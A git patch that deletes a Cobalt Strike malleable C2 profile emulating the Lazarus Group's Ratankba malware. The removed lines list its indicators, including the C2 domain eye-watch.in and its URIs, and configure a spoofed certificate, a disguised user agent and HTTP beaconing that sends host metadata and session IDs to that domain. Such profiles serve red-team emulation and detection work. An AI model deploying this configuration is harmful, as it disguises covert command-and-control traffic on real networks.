From 0afe493e70fb99b64a663004c5a1323a61e16ed7 Mon Sep 17 00:00:00 2001
From: xx0hcd
Date: Mon, 10 Apr 2017 10:24:09 -0500
Subject: [PATCH] Delete ratankba.profile

---
 ratankba.profile | 116 ----------------------------------------------
 1 file changed, 116 deletions(-)
 delete mode 100644 ratankba.profile

diff --git a/ratankba.profile b/ratankba.profile
deleted file mode 100644
index 8476211..0000000
--- a/ratankba.profile
+++ /dev/null
@@ -1,116 +0,0 @@
-#ratankba malware used by 'lazarus group'
-#xx0hcd
-#IOC's:
-#C2 = www.eye-watch.in
-#C2 URI's = '/jscroll/board/list.jpg', '/design/dfbox/list.jpg', and '/design/img/list.jpg'
-#C2 params = 'u=' and coresponding command string (here we use Beacon comms instead) (listed all param info from docs though only used two)
-#C2 param1 = '?action=What&u=' -- action to perform
-#C2 param2 = '?action=CmdRes&u=&err=kill' -- result of command error code
-#C2 param3 = '?action=CmdRes&u=&err=exec' -- result of command return code
-#C2 param4 = '?action=BaseInfo&u=' -- basic information collected
-
-#openssl to be realistic as possible
-https-certificate {
- set CN "eye-watch.in";
- set O "Amazon";
- set C "US";
- set L "Scottsdale";
- set OU "Starfield Class";
- set ST "Arizona";
- set validity "365";
-}
-
-set sleeptime "30000";
-set jitter "20";
-set useragent "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0";
-set dns_idle "8.8.8.8";
-set maxdns "235";
-
-http-get {
-
- set uri "/jscroll/board/list.jpg /design/dfbox/list.jpg /design/img/list.jpg";
-
- client {
-
- header "Host" "www.eye-watch.in";
- header "Accept" "*/*";
- header "Cookie" "0449651003fe48-Nff0eb7";
- parameter "action" "What";
-
- metadata {
- netbios;
- parameter "u";
-
- }
-
-
-
- }
-
- server {
-
- header "Cache-Control" "private, max-age=0";
- header "Content-Type" "text/html; charset=utf-8";
- header "Server" "nginx/1.4.6 (Ubuntu)";
- header "Connection" "close";
-
-
- output {
- netbios;
- print;
- }
- }
-}
-
-http-post {
-
- set uri "/jscroll/board/List.jpg /design/dfbox/List.jpg /design/img/List.jpg";
- set verb "GET";
-
- client {
-
- header "Host" "www.eye-watch.in";
- header "Accept" "*/*";
- parameter "action" "BaseInfo";
-
- output {
- netbios;
- parameter "u";
-
-
- }
-
- parameter "err" "kill";
-
- id {
- base64url;
- prepend "0449651003fe48-";
- header "Cookie";
-
- }
- }
-
- server {
-
- header "Cache-Control" "private, max-age=0";
- header "Content-Type" "text/html; charset=utf-8";
- header "Server" "nginx/1.4.6 (Ubuntu)";
- header "Connection" "close";
-
-
- output {
- netbios;
- print;
- }
- }
-}
-
-http-stager {
- server {
- header "Cache-Control" "private, max-age=0";
- header "Content-Type" "text/html; charset=utf-8";
- header "Server" "nginx/1.4.6 (Ubuntu)";
- header "Connection" "close";
- }
-}
-